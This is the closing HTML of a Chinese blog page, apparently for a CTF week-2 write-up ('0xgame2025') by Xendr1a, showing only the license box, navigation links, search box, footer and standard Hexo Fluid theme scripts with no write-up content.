    
      <span class="category-chain">
        
  <a href="/categories/CTF/" class="category-chain-item">CTF</a>
  
  
    <span>></span>
    
  <a href="/categories/CTF/WP/" class="category-chain-item">WP</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/CTF/" class="print-no-link">#CTF</a>
      
        <a href="/tags/WP/" class="print-no-link">#WP</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>0xgame2025</div>
      <div>https://xendr1a.github.io/2025/10/23/0xgame2025-week2/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Xendr1a</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年10月23日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/10/29/0xgame2025-week3/" title="0xgame2025">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">0xgame2025</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/10/15/newstar2025-week1/" title="newstar2025">
                        <span class="hidden-mobile">newstar2025</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>







  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    function isExpandAllEnabled() {
      return CONFIG.toc && CONFIG.toc.expand_all === true;
    }
    function expandAllToc() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .tocbot-is-collapsed').removeClass('tocbot-is-collapsed');
    }
    function updateTocToggle($li, $childList) {
      var $toggle = $li.children('.toc-toggle');
      if ($toggle.length === 0) { return; }
      var collapsed = $childList.hasClass('tocbot-is-collapsed');
      $toggle
        .toggleClass('toc-toggle-collapsed', collapsed)
        .toggleClass('toc-toggle-expanded', !collapsed);
    }
    function bindTocToggle() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .toc-list-item').each(function() {
        var $li = jQuery(this);
        var $childList = $li.children('ol');
        if ($childList.length === 0) {
          if ($li.children('.toc-toggle').length === 0) {
            $li.prepend('<span class="toc-toggle toc-toggle-placeholder" aria-hidden="true">›</span>');
          }
          return;
        }

        if ($li.children('.toc-toggle').length === 0) {
          $li.prepend('<span class="toc-toggle toc-toggle-expanded" aria-hidden="true">›</span>');
        }
        updateTocToggle($li, $childList);
      });
      jQuery('#toc-body').off('click.tocToggle').on('click.tocToggle', '.toc-toggle', function(e) {
        e.preventDefault();
        e.stopPropagation();
        var $li = jQuery(this).parent('.toc-list-item');
        var $childList = $li.children('ol');
        if ($childList.length === 0) { return; }
        $childList.toggleClass('tocbot-is-collapsed');
        updateTocToggle($li, $childList);
      });
      if (!window.__tocToggleObserver) {
        window.__tocToggleObserver = new MutationObserver(function(mutations) {
          mutations.forEach(function(mutation) {
            if (mutation.type !== 'attributes' || mutation.attributeName !== 'class') { return; }
            var $list = jQuery(mutation.target);
            var $li = $list.parent('.toc-list-item');
            if ($li.length === 0) { return; }
            updateTocToggle($li, $list);
          });
        });
        jQuery('#toc-body ol').each(function() {
          window.__tocToggleObserver.observe(this, { attributes: true });
        });
      }
    }
    var tocConfig = Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc);
    if (isExpandAllEnabled()) {
      tocConfig.collapseDepth = 6;
    }
    window.tocbot.init(tocConfig);
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
    expandAllToc();
    bindTocToggle();

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
        expandAllToc();
        bindTocToggle();
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
